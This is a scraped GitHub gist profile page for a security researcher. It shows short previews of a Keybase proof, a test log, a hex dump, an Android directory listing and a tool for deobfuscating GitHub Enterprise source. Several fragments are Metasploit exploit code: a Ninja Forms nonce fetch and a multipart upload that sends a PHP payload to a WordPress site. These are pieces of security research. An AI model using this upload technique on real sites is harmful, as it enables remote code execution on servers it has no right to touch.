Skip to content

Instantly share code, notes, and snippets.

sinn3r wchen-r7

Block or report user

Report or block wchen-r7

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:cbb6b47f096eb4fd4a7c1c53d43d574f
### Keybase proof
I hereby claim:
* I am wchen-r7 on github.
* I am wchenr7 (https://keybase.io/wchenr7) on keybase.
* I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7
To claim this, I am signing this object:
View decrypt_github_enterprise.rb
#!/usr/bin/ruby
#
# This tool is only used to "decrypt" the github enterprise source code.
#
# Run in the /data directory of the instance.
require "zlib"
require "byebug"
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+
View gist:701269eaf9ce2c17ad3888e18ce12248
def fetch_ninja_form_nonce
uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
puts res.body
fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200
res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]
View gist:f1eabf17cb1f9f5a655b879d42c39682
def generate_mime_message(payload_name, nonce)
puts "--- You have nonce: #{nonce.inspect}"
data = Rex::MIME::Message.new
data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
data.add_part(nonce, nil, nil, 'form-data; name="security"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
data
end
View gist:3d8b95aa9f3e14df8d65
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
load "./lib/msf/core/exploit/exe.rb"
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
View gist:847a8d1246395bdbf7b1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento Downloader</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="icon"/>
<link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="shortcut icon"/>
<script type="text/javascript" src="js/prototype.js"></script>
View gist:557f825614eba20f27d7
$ rake cucumber spec coverage DATABASE_ADAPTER=sqlite3
/Users/wchen/.rvm/rubies/ruby-2.1.6/bin/ruby -S bundle exec cucumber features --format Fivemat
'derives' shared examples' attribute_type method ............ (23.01s)
validates keyword argument .......... (17.46s)
7 scenarios (7 passed)
22 steps (22 passed)
0m40.481s
Coverage report generated for 'derives' shared examples' :validates keyword argument With `validates: false`, 'derives' shared examples' :validates keyword argument With `validates: true`, 'derives' shared examples' :validates keyword argument Without `:validates` keyword argument, 'derives' shared examples' attribute_type method With `:datetime` for attribute_type, 'derives' shared examples' attribute_type method With `:string` for attribute_type, 'derives' shared examples' attribute_type method With `:text` for attribute_type, 'derives' shared examples' attribute_type method Without `:datetime`, `:string`, or `:text` for attribute_type, Cucumber Features, RSpec to /Users/wchen/rapid7/metasp
View gist:d5a1fbd08923ea47ddc3
01b4766c 8c f5 4e 00 00 00 00 00 00 00 00 00 d4 75 ..N..........u
01b4767a b4 01 e4 75 b4 01 00 00 00 00 b0 d9 12 00 ...u..........
01b47688 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 ..............
01b47696 00 00 68 dc 78 01 88 d5 78 01 88 d5 78 01 ..h.x...x...x.
01b476a4 01 00 00 00 d8 2f 12 00 70 84 51 00 70 84 ...../..p.Q.p.
01b476b2 51 00 70 84 51 00 70 84 51 00 70 84 51 00 Q.p.Q.p.Q.p.Q.
01b476c0 70 84 51 00 70 84 51 00 70 84 51 00 00 00 p.Q.p.Q.p.Q...
01b476ce 00 00 00 00 00 00 70 84 51 00 70 84 51 00 ......p.Q.p.Q.
01b476dc 70 84 51 00 70 84 51 00 70 84 51 00 70 84 p.Q.p.Q.p.Q.p.
01b476ea 51 00 70 84 51 00 38 d5 78 01 c8 d6 78 01 Q.p.Q.8.x...x.
View com.ilegendsoft.mercury
root@generic:/data/data/com.ilegendsoft.mercury # pwd
/data/data/com.ilegendsoft.mercury
root@generic:/data/data/com.ilegendsoft.mercury # ls -R
.:
app_webview
cache
code_cache
databases
files
You can’t perform that action at this time.